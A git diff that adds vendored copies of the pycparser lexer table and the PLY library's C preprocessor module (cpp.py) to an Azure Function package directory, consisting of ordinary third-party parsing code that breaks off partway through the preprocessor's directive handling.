'TYPEDEF', 'XOR', 'AUTO', 'TIMES', 'LPAREN', 'MINUSMINUS', 'ID', 'IF', 'STRING_LITERAL', 'FLOAT', 'XOREQUAL', 'LSHIFTEQUAL', 'RBRACKET')) +_lexreflags = 64 +_lexliterals = '' +_lexstateinfo = {'ppline': 'exclusive', 'pppragma': 'exclusive', 'INITIAL': 'inclusive'} +_lexstatere = {'ppline': [('(?P"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P(0(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|([1-9][0-9]*(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?))|(?P\\n)|(?Pline)', [None, ('t_ppline_FILENAME', 'FILENAME'), None, None, ('t_ppline_LINE_NUMBER', 'LINE_NUMBER'), None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, ('t_ppline_NEWLINE', 'NEWLINE'), ('t_ppline_PPLINE', 'PPLINE')])], 'pppragma': [('(?P\\n)|(?Ppragma)|(?P.+)', [None, ('t_pppragma_NEWLINE', 'NEWLINE'), ('t_pppragma_PPPRAGMA', 'PPPRAGMA'), ('t_pppragma_STR', 'STR')])], 'INITIAL': [('(?P[ \\t]*\\#)|(?P\\n+)|(?P\\{)|(?P\\})|(?P((((([0-9]*\\.[0-9]+)|([0-9]+\\.))([eE][-+]?[0-9]+)?)|([0-9]+([eE][-+]?[0-9]+)))[FfLl]?))|(?P(0[xX]([0-9a-fA-F]+|((([0-9a-fA-F]+)?\\.[0-9a-fA-F]+)|([0-9a-fA-F]+\\.)))([pP][+-]?[0-9]+)[FfLl]?))|(?P0[xX][0-9a-fA-F]+(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|(?P0[bB][01]+(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)', [None, ('t_PPHASH', 'PPHASH'), ('t_NEWLINE', 'NEWLINE'), ('t_LBRACE', 'LBRACE'), ('t_RBRACE', 'RBRACE'), ('t_FLOAT_CONST', 'FLOAT_CONST'), None, None, None, None, None, None, None, None, None, ('t_HEX_FLOAT_CONST', 'HEX_FLOAT_CONST'), None, None, None, None, None, None, None, ('t_INT_CONST_HEX', 'INT_CONST_HEX'), None, None, None, None, None, None, None, 
('t_INT_CONST_BIN', 'INT_CONST_BIN')]), ('(?P0[0-7]*[89])|(?P0[0-7]*(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|(?P(0(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?)|([1-9][0-9]*(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?))|(?P\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F])))){2,4}\')|(?P\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?PL\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?Pu8\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?Pu\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')|(?PU\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))\')', [None, ('t_BAD_CONST_OCT', 'BAD_CONST_OCT'), ('t_INT_CONST_OCT', 'INT_CONST_OCT'), None, None, None, None, None, None, None, ('t_INT_CONST_DEC', 'INT_CONST_DEC'), None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, ('t_INT_CONST_CHAR', 'INT_CONST_CHAR'), None, None, None, None, None, None, ('t_CHAR_CONST', 'CHAR_CONST'), None, None, None, None, None, None, ('t_WCHAR_CONST', 'WCHAR_CONST'), None, None, None, None, None, None, ('t_U8CHAR_CONST', 'U8CHAR_CONST'), None, None, None, None, None, None, ('t_U16CHAR_CONST', 'U16CHAR_CONST'), None, None, None, None, None, None, ('t_U32CHAR_CONST', 'U32CHAR_CONST')]), ('(?P(\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))*\\n)|(\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))*$))|(?P(\'([^\'\\\\\\n]|(\\\\(([a-wyzA-Z._~!=&\\^\\-\\\\?\'"]|x(?![0-9a-fA-F]))|(\\d+)(?!\\d)|(x[0-9a-fA-F]+)(?![0-9a-fA-F]))))[^\'\n]+\')|(\'\')|(\'([\\\\][^a-zA-Z._~^!=&\\^\\-\\\\?\'"x0-9])[^\'\\n]*\'))|(?PL"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?Pu8"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?Pu"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?PU"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*([\\\\][^a-zA-Z._~^!=&\\^\\-\\\\?\'"x0-9])([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P[a-zA-Z_$][0-9a-zA-Z_$]*)|(?P"([^"\\\\\\n]|(\\\\[0-9a-zA-Z._~!=&\\^\\-\\\\?\'"]))*")|(?P\\.\\.\\.)|(?P\\+\\+)|(?P\\|\\|)|(?P\\^=)|(?P\\|=)|(?P<<=)|(?P>>=)|(?P\\+=)|(?P\\*=)', [None, ('t_UNMATCHED_QUOTE', 'UNMATCHED_QUOTE'), None, None, None, None, None, None, None, None, None, None, None, None, None, None, ('t_BAD_CHAR_CONST', 'BAD_CHAR_CONST'), None, None, None, None, None, None, None, None, None, None, ('t_WSTRING_LITERAL', 'WSTRING_LITERAL'), None, None, ('t_U8STRING_LITERAL', 'U8STRING_LITERAL'), None, None, ('t_U16STRING_LITERAL', 'U16STRING_LITERAL'), None, None, ('t_U32STRING_LITERAL', 'U32STRING_LITERAL'), None, None, ('t_BAD_STRING_LITERAL', 'BAD_STRING_LITERAL'), None, None, None, None, None, ('t_ID', 'ID'), (None, 'STRING_LITERAL'), None, None, (None, 'ELLIPSIS'), (None, 'PLUSPLUS'), (None, 'LOR'), (None, 'XOREQUAL'), (None, 'OREQUAL'), (None, 'LSHIFTEQUAL'), (None, 'RSHIFTEQUAL'), (None, 'PLUSEQUAL'), (None, 'TIMESEQUAL')]), 
('(?P\\+)|(?P%=)|(?P/=)|(?P\\])|(?P\\?)|(?P\\^)|(?P<<)|(?P<=)|(?P\\()|(?P->)|(?P==)|(?P!=)|(?P--)|(?P\\|)|(?P\\*)|(?P\\[)|(?P>=)|(?P\\))|(?P&&)|(?P>>)|(?P-=)|(?P\\.)|(?P&=)|(?P=)|(?P<)|(?P,)|(?P/)|(?P&)|(?P%)|(?P;)|(?P-)|(?P>)|(?P:)|(?P~)|(?P!)', [None, (None, 'PLUS'), (None, 'MODEQUAL'), (None, 'DIVEQUAL'), (None, 'RBRACKET'), (None, 'CONDOP'), (None, 'XOR'), (None, 'LSHIFT'), (None, 'LE'), (None, 'LPAREN'), (None, 'ARROW'), (None, 'EQ'), (None, 'NE'), (None, 'MINUSMINUS'), (None, 'OR'), (None, 'TIMES'), (None, 'LBRACKET'), (None, 'GE'), (None, 'RPAREN'), (None, 'LAND'), (None, 'RSHIFT'), (None, 'MINUSEQUAL'), (None, 'PERIOD'), (None, 'ANDEQUAL'), (None, 'EQUALS'), (None, 'LT'), (None, 'COMMA'), (None, 'DIVIDE'), (None, 'AND'), (None, 'MOD'), (None, 'SEMI'), (None, 'MINUS'), (None, 'GT'), (None, 'COLON'), (None, 'NOT'), (None, 'LNOT')])]} +_lexstateignore = {'ppline': ' \t', 'pppragma': ' \t', 'INITIAL': ' \t'} +_lexstateerrorf = {'ppline': 't_ppline_error', 'pppragma': 't_pppragma_error', 'INITIAL': 't_error'} +_lexstateeoff = {} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__init__.py new file mode 100644 index 0000000..86aa2b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__init__.py @@ -0,0 +1,5 @@ +# PLY package +# Author: David Beazley (dave@dabeaz.com) + +__version__ = '3.9' +__all__ = ['lex','yacc'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..63ec6d9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/cpp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/cpp.cpython-39.pyc new file mode 100644 index 0000000..390f15e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/cpp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ctokens.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ctokens.cpython-39.pyc new file mode 100644 index 0000000..6058386 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ctokens.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/lex.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/lex.cpython-39.pyc new file mode 100644 index 0000000..4fb334e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/lex.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/yacc.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/yacc.cpython-39.pyc new file mode 100644 index 0000000..105f10b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/yacc.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ygen.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ygen.cpython-39.pyc new file mode 100644 index 0000000..75d64b6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/__pycache__/ygen.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/cpp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/cpp.py new file mode 100644 index 0000000..7c1c288 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/cpp.py @@ -0,0 +1,905 @@ +# ----------------------------------------------------------------------------- +# cpp.py +# +# Author: David Beazley (http://www.dabeaz.com) +# Copyright (C) 2017 +# All rights reserved +# +# This module implements an ANSI-C style lexical preprocessor for PLY. +# ----------------------------------------------------------------------------- +import sys + +# Some Python 3 compatibility shims +if sys.version_info.major < 3: + STRING_TYPES = (str, unicode) +else: + STRING_TYPES = str + xrange = range + +# ----------------------------------------------------------------------------- +# Default preprocessor lexer definitions. These tokens are enough to get +# a basic preprocessor working. Other modules may import these if they want +# ----------------------------------------------------------------------------- + +tokens = ( + 'CPP_ID','CPP_INTEGER', 'CPP_FLOAT', 'CPP_STRING', 'CPP_CHAR', 'CPP_WS', 'CPP_COMMENT1', 'CPP_COMMENT2', 'CPP_POUND','CPP_DPOUND' +) + +literals = "+-*/%|&~^<>=!?()[]{}.,;:\\\'\"" + +# Whitespace +def t_CPP_WS(t): + r'\s+' + t.lexer.lineno += t.value.count("\n") + return t + +t_CPP_POUND = r'\#' +t_CPP_DPOUND = r'\#\#' + +# Identifier +t_CPP_ID = r'[A-Za-z_][\w_]*' + +# Integer literal +def CPP_INTEGER(t): + r'(((((0x)|(0X))[0-9a-fA-F]+)|(\d+))([uU][lL]|[lL][uU]|[uU]|[lL])?)' + return t + +t_CPP_INTEGER = CPP_INTEGER + +# Floating literal +t_CPP_FLOAT = r'((\d+)(\.\d+)(e(\+|-)?(\d+))? | (\d+)e(\+|-)?(\d+))([lL]|[fF])?' 
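+
+# Illustrative examples of inputs matched by the two literal rules above:
+#   CPP_INTEGER: 42, 0x1F, 42UL
+#   CPP_FLOAT:   1.5, 6.02e23, 1.0f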
+ +# String literal +def t_CPP_STRING(t): + r'\"([^\\\n]|(\\(.|\n)))*?\"' + t.lexer.lineno += t.value.count("\n") + return t + +# Character constant 'c' or L'c' +def t_CPP_CHAR(t): + r'(L)?\'([^\\\n]|(\\(.|\n)))*?\'' + t.lexer.lineno += t.value.count("\n") + return t + +# Comment +def t_CPP_COMMENT1(t): + r'(/\*(.|\n)*?\*/)' + ncr = t.value.count("\n") + t.lexer.lineno += ncr + # replace with one space or a number of '\n' + t.type = 'CPP_WS'; t.value = '\n' * ncr if ncr else ' ' + return t + +# Line comment +def t_CPP_COMMENT2(t): + r'(//.*?(\n|$))' + # replace with '/n' + t.type = 'CPP_WS'; t.value = '\n' + return t + +def t_error(t): + t.type = t.value[0] + t.value = t.value[0] + t.lexer.skip(1) + return t + +import re +import copy +import time +import os.path + +# ----------------------------------------------------------------------------- +# trigraph() +# +# Given an input string, this function replaces all trigraph sequences. +# The following mapping is used: +# +# ??= # +# ??/ \ +# ??' ^ +# ??( [ +# ??) ] +# ??! | +# ??< { +# ??> } +# ??- ~ +# ----------------------------------------------------------------------------- + +_trigraph_pat = re.compile(r'''\?\?[=/\'\(\)\!<>\-]''') +_trigraph_rep = { + '=':'#', + '/':'\\', + "'":'^', + '(':'[', + ')':']', + '!':'|', + '<':'{', + '>':'}', + '-':'~' +} + +def trigraph(input): + return _trigraph_pat.sub(lambda g: _trigraph_rep[g.group()[-1]],input) + +# ------------------------------------------------------------------ +# Macro object +# +# This object holds information about preprocessor macros +# +# .name - Macro name (string) +# .value - Macro value (a list of tokens) +# .arglist - List of argument names +# .variadic - Boolean indicating whether or not variadic macro +# .vararg - Name of the variadic parameter +# +# When a macro is created, the macro replacement token sequence is +# pre-scanned and used to create patch lists that are later used +# during macro expansion +# ------------------------------------------------------------------ + +class Macro(object): + def __init__(self,name,value,arglist=None,variadic=False): + self.name = name + self.value = value + self.arglist = arglist + self.variadic = variadic + if variadic: + self.vararg = arglist[-1] + self.source = None + +# ------------------------------------------------------------------ +# Preprocessor object +# +# Object representing a preprocessor. Contains macro definitions, +# include directories, and other information +# ------------------------------------------------------------------ + +class Preprocessor(object): + def __init__(self,lexer=None): + if lexer is None: + lexer = lex.lexer + self.lexer = lexer + self.macros = { } + self.path = [] + self.temp_path = [] + + # Probe the lexer for selected tokens + self.lexprobe() + + tm = time.localtime() + self.define("__DATE__ \"%s\"" % time.strftime("%b %d %Y",tm)) + self.define("__TIME__ \"%s\"" % time.strftime("%H:%M:%S",tm)) + self.parser = None + + # ----------------------------------------------------------------------------- + # tokenize() + # + # Utility function. 
Given a string of text, tokenize into a list of tokens + # ----------------------------------------------------------------------------- + + def tokenize(self,text): + tokens = [] + self.lexer.input(text) + while True: + tok = self.lexer.token() + if not tok: break + tokens.append(tok) + return tokens + + # --------------------------------------------------------------------- + # error() + # + # Report a preprocessor error/warning of some kind + # ---------------------------------------------------------------------- + + def error(self,file,line,msg): + print("%s:%d %s" % (file,line,msg)) + + # ---------------------------------------------------------------------- + # lexprobe() + # + # This method probes the preprocessor lexer object to discover + # the token types of symbols that are important to the preprocessor. + # If this works right, the preprocessor will simply "work" + # with any suitable lexer regardless of how tokens have been named. + # ---------------------------------------------------------------------- + + def lexprobe(self): + + # Determine the token type for identifiers + self.lexer.input("identifier") + tok = self.lexer.token() + if not tok or tok.value != "identifier": + print("Couldn't determine identifier type") + else: + self.t_ID = tok.type + + # Determine the token type for integers + self.lexer.input("12345") + tok = self.lexer.token() + if not tok or int(tok.value) != 12345: + print("Couldn't determine integer type") + else: + self.t_INTEGER = tok.type + self.t_INTEGER_TYPE = type(tok.value) + + # Determine the token type for strings enclosed in double quotes + self.lexer.input("\"filename\"") + tok = self.lexer.token() + if not tok or tok.value != "\"filename\"": + print("Couldn't determine string type") + else: + self.t_STRING = tok.type + + # Determine the token type for whitespace--if any + self.lexer.input(" ") + tok = self.lexer.token() + if not tok or tok.value != " ": + self.t_SPACE = None + else: + self.t_SPACE = tok.type + + # Determine the token type for newlines + self.lexer.input("\n") + tok = self.lexer.token() + if not tok or tok.value != "\n": + self.t_NEWLINE = None + print("Couldn't determine token for newlines") + else: + self.t_NEWLINE = tok.type + + self.t_WS = (self.t_SPACE, self.t_NEWLINE) + + # Check for other characters used by the preprocessor + chars = [ '<','>','#','##','\\','(',')',',','.'] + for c in chars: + self.lexer.input(c) + tok = self.lexer.token() + if not tok or tok.value != c: + print("Unable to lex '%s' required for preprocessor" % c) + + # ---------------------------------------------------------------------- + # add_path() + # + # Adds a search path to the preprocessor. + # ---------------------------------------------------------------------- + + def add_path(self,path): + self.path.append(path) + + # ---------------------------------------------------------------------- + # group_lines() + # + # Given an input string, this function splits it into lines. Trailing whitespace + # is removed. Any line ending with \ is grouped with the next line. This + # function forms the lowest level of the preprocessor---grouping into text into + # a line-by-line format. 
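+    # For example (illustrative): the two physical lines
+    #
+    #     #define ADD(x,y) \
+    #         ((x)+(y))
+    #
+    # are joined, with the trailing backslash removed, and yielded as the
+    # tokens of the single logical line "#define ADD(x,y)     ((x)+(y))".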
+ # ---------------------------------------------------------------------- + + def group_lines(self,input): + lex = self.lexer.clone() + lines = [x.rstrip() for x in input.splitlines()] + for i in xrange(len(lines)): + j = i+1 + while lines[i].endswith('\\') and (j < len(lines)): + lines[i] = lines[i][:-1]+lines[j] + lines[j] = "" + j += 1 + + input = "\n".join(lines) + lex.input(input) + lex.lineno = 1 + + current_line = [] + while True: + tok = lex.token() + if not tok: + break + current_line.append(tok) + if tok.type in self.t_WS and '\n' in tok.value: + yield current_line + current_line = [] + + if current_line: + yield current_line + + # ---------------------------------------------------------------------- + # tokenstrip() + # + # Remove leading/trailing whitespace tokens from a token list + # ---------------------------------------------------------------------- + + def tokenstrip(self,tokens): + i = 0 + while i < len(tokens) and tokens[i].type in self.t_WS: + i += 1 + del tokens[:i] + i = len(tokens)-1 + while i >= 0 and tokens[i].type in self.t_WS: + i -= 1 + del tokens[i+1:] + return tokens + + + # ---------------------------------------------------------------------- + # collect_args() + # + # Collects comma separated arguments from a list of tokens. The arguments + # must be enclosed in parenthesis. Returns a tuple (tokencount,args,positions) + # where tokencount is the number of tokens consumed, args is a list of arguments, + # and positions is a list of integers containing the starting index of each + # argument. Each argument is represented by a list of tokens. + # + # When collecting arguments, leading and trailing whitespace is removed + # from each argument. + # + # This function properly handles nested parenthesis and commas---these do not + # define new arguments. + # ---------------------------------------------------------------------- + + def collect_args(self,tokenlist): + args = [] + positions = [] + current_arg = [] + nesting = 1 + tokenlen = len(tokenlist) + + # Search for the opening '('. 
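+        # Concretely (an illustrative case): for the tokens of
+        # "(a, (b, c), d)" this yields three arguments -- [a], [(b, c)]
+        # and [d] -- because the comma inside the nested parentheses does
+        # not split an argument.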
+ i = 0 + while (i < tokenlen) and (tokenlist[i].type in self.t_WS): + i += 1 + + if (i < tokenlen) and (tokenlist[i].value == '('): + positions.append(i+1) + else: + self.error(self.source,tokenlist[0].lineno,"Missing '(' in macro arguments") + return 0, [], [] + + i += 1 + + while i < tokenlen: + t = tokenlist[i] + if t.value == '(': + current_arg.append(t) + nesting += 1 + elif t.value == ')': + nesting -= 1 + if nesting == 0: + if current_arg: + args.append(self.tokenstrip(current_arg)) + positions.append(i) + return i+1,args,positions + current_arg.append(t) + elif t.value == ',' and nesting == 1: + args.append(self.tokenstrip(current_arg)) + positions.append(i+1) + current_arg = [] + else: + current_arg.append(t) + i += 1 + + # Missing end argument + self.error(self.source,tokenlist[-1].lineno,"Missing ')' in macro arguments") + return 0, [],[] + + # ---------------------------------------------------------------------- + # macro_prescan() + # + # Examine the macro value (token sequence) and identify patch points + # This is used to speed up macro expansion later on---we'll know + # right away where to apply patches to the value to form the expansion + # ---------------------------------------------------------------------- + + def macro_prescan(self,macro): + macro.patch = [] # Standard macro arguments + macro.str_patch = [] # String conversion expansion + macro.var_comma_patch = [] # Variadic macro comma patch + i = 0 + while i < len(macro.value): + if macro.value[i].type == self.t_ID and macro.value[i].value in macro.arglist: + argnum = macro.arglist.index(macro.value[i].value) + # Conversion of argument to a string + if i > 0 and macro.value[i-1].value == '#': + macro.value[i] = copy.copy(macro.value[i]) + macro.value[i].type = self.t_STRING + del macro.value[i-1] + macro.str_patch.append((argnum,i-1)) + continue + # Concatenation + elif (i > 0 and macro.value[i-1].value == '##'): + macro.patch.append(('c',argnum,i-1)) + del macro.value[i-1] + continue + elif ((i+1) < len(macro.value) and macro.value[i+1].value == '##'): + macro.patch.append(('c',argnum,i)) + i += 1 + continue + # Standard expansion + else: + macro.patch.append(('e',argnum,i)) + elif macro.value[i].value == '##': + if macro.variadic and (i > 0) and (macro.value[i-1].value == ',') and \ + ((i+1) < len(macro.value)) and (macro.value[i+1].type == self.t_ID) and \ + (macro.value[i+1].value == macro.vararg): + macro.var_comma_patch.append(i-1) + i += 1 + macro.patch.sort(key=lambda x: x[2],reverse=True) + + # ---------------------------------------------------------------------- + # macro_expand_args() + # + # Given a Macro and list of arguments (each a token list), this method + # returns an expanded version of a macro. The return value is a token sequence + # representing the replacement macro tokens + # ---------------------------------------------------------------------- + + def macro_expand_args(self,macro,args): + # Make a copy of the macro token sequence + rep = [copy.copy(_x) for _x in macro.value] + + # Make string expansion patches. These do not alter the length of the replacement sequence + + str_expansion = {} + for argnum, i in macro.str_patch: + if argnum not in str_expansion: + str_expansion[argnum] = ('"%s"' % "".join([x.value for x in args[argnum]])).replace("\\","\\\\") + rep[i] = copy.copy(rep[i]) + rep[i].value = str_expansion[argnum] + + # Make the variadic macro comma patch. 
If the variadic macro argument is empty, we get rid + comma_patch = False + if macro.variadic and not args[-1]: + for i in macro.var_comma_patch: + rep[i] = None + comma_patch = True + + # Make all other patches. The order of these matters. It is assumed that the patch list + # has been sorted in reverse order of patch location since replacements will cause the + # size of the replacement sequence to expand from the patch point. + + expanded = { } + for ptype, argnum, i in macro.patch: + # Concatenation. Argument is left unexpanded + if ptype == 'c': + rep[i:i+1] = args[argnum] + # Normal expansion. Argument is macro expanded first + elif ptype == 'e': + if argnum not in expanded: + expanded[argnum] = self.expand_macros(args[argnum]) + rep[i:i+1] = expanded[argnum] + + # Get rid of removed comma if necessary + if comma_patch: + rep = [_i for _i in rep if _i] + + return rep + + + # ---------------------------------------------------------------------- + # expand_macros() + # + # Given a list of tokens, this function performs macro expansion. + # The expanded argument is a dictionary that contains macros already + # expanded. This is used to prevent infinite recursion. + # ---------------------------------------------------------------------- + + def expand_macros(self,tokens,expanded=None): + if expanded is None: + expanded = {} + i = 0 + while i < len(tokens): + t = tokens[i] + if t.type == self.t_ID: + if t.value in self.macros and t.value not in expanded: + # Yes, we found a macro match + expanded[t.value] = True + + m = self.macros[t.value] + if not m.arglist: + # A simple macro + ex = self.expand_macros([copy.copy(_x) for _x in m.value],expanded) + for e in ex: + e.lineno = t.lineno + tokens[i:i+1] = ex + i += len(ex) + else: + # A macro with arguments + j = i + 1 + while j < len(tokens) and tokens[j].type in self.t_WS: + j += 1 + if tokens[j].value == '(': + tokcount,args,positions = self.collect_args(tokens[j:]) + if not m.variadic and len(args) != len(m.arglist): + self.error(self.source,t.lineno,"Macro %s requires %d arguments" % (t.value,len(m.arglist))) + i = j + tokcount + elif m.variadic and len(args) < len(m.arglist)-1: + if len(m.arglist) > 2: + self.error(self.source,t.lineno,"Macro %s must have at least %d arguments" % (t.value, len(m.arglist)-1)) + else: + self.error(self.source,t.lineno,"Macro %s must have at least %d argument" % (t.value, len(m.arglist)-1)) + i = j + tokcount + else: + if m.variadic: + if len(args) == len(m.arglist)-1: + args.append([]) + else: + args[len(m.arglist)-1] = tokens[j+positions[len(m.arglist)-1]:j+tokcount-1] + del args[len(m.arglist):] + + # Get macro replacement text + rep = self.macro_expand_args(m,args) + rep = self.expand_macros(rep,expanded) + for r in rep: + r.lineno = t.lineno + tokens[i:j+tokcount] = rep + i += len(rep) + del expanded[t.value] + continue + elif t.value == '__LINE__': + t.type = self.t_INTEGER + t.value = self.t_INTEGER_TYPE(t.lineno) + + i += 1 + return tokens + + # ---------------------------------------------------------------------- + # evalexpr() + # + # Evaluate an expression token sequence for the purposes of evaluating + # integral expressions. 
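+    # For example (illustrative): with FOO defined and BAR defined as 2,
+    # the controlling expression "defined(FOO) && BAR > 1" is rewritten to
+    # the Python expression "1 and 2 > 1" (defined(...) folds to 1L/0L and
+    # the suffix is stripped below; &&, || and ! map to and, or, not)
+    # before being handed to eval().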
+ # ---------------------------------------------------------------------- + + def evalexpr(self,tokens): + # tokens = tokenize(line) + # Search for defined macros + i = 0 + while i < len(tokens): + if tokens[i].type == self.t_ID and tokens[i].value == 'defined': + j = i + 1 + needparen = False + result = "0L" + while j < len(tokens): + if tokens[j].type in self.t_WS: + j += 1 + continue + elif tokens[j].type == self.t_ID: + if tokens[j].value in self.macros: + result = "1L" + else: + result = "0L" + if not needparen: break + elif tokens[j].value == '(': + needparen = True + elif tokens[j].value == ')': + break + else: + self.error(self.source,tokens[i].lineno,"Malformed defined()") + j += 1 + tokens[i].type = self.t_INTEGER + tokens[i].value = self.t_INTEGER_TYPE(result) + del tokens[i+1:j+1] + i += 1 + tokens = self.expand_macros(tokens) + for i,t in enumerate(tokens): + if t.type == self.t_ID: + tokens[i] = copy.copy(t) + tokens[i].type = self.t_INTEGER + tokens[i].value = self.t_INTEGER_TYPE("0L") + elif t.type == self.t_INTEGER: + tokens[i] = copy.copy(t) + # Strip off any trailing suffixes + tokens[i].value = str(tokens[i].value) + while tokens[i].value[-1] not in "0123456789abcdefABCDEF": + tokens[i].value = tokens[i].value[:-1] + + expr = "".join([str(x.value) for x in tokens]) + expr = expr.replace("&&"," and ") + expr = expr.replace("||"," or ") + expr = expr.replace("!"," not ") + try: + result = eval(expr) + except Exception: + self.error(self.source,tokens[0].lineno,"Couldn't evaluate expression") + result = 0 + return result + + # ---------------------------------------------------------------------- + # parsegen() + # + # Parse an input string/ + # ---------------------------------------------------------------------- + def parsegen(self,input,source=None): + + # Replace trigraph sequences + t = trigraph(input) + lines = self.group_lines(t) + + if not source: + source = "" + + self.define("__FILE__ \"%s\"" % source) + + self.source = source + chunk = [] + enable = True + iftrigger = False + ifstack = [] + + for x in lines: + for i,tok in enumerate(x): + if tok.type not in self.t_WS: break + if tok.value == '#': + # Preprocessor directive + + # insert necessary whitespace instead of eaten tokens + for tok in x: + if tok.type in self.t_WS and '\n' in tok.value: + chunk.append(tok) + + dirtokens = self.tokenstrip(x[i+1:]) + if dirtokens: + name = dirtokens[0].value + args = self.tokenstrip(dirtokens[1:]) + else: + name = "" + args = [] + + if name == 'define': + if enable: + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + self.define(args) + elif name == 'include': + if enable: + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + oldfile = self.macros['__FILE__'] + for tok in self.include(args): + yield tok + self.macros['__FILE__'] = oldfile + self.source = source + elif name == 'undef': + if enable: + for tok in self.expand_macros(chunk): + yield tok + chunk = [] + self.undef(args) + elif name == 'ifdef': + ifstack.append((enable,iftrigger)) + if enable: + if not args[0].value in self.macros: + enable = False + iftrigger = False + else: + iftrigger = True + elif name == 'ifndef': + 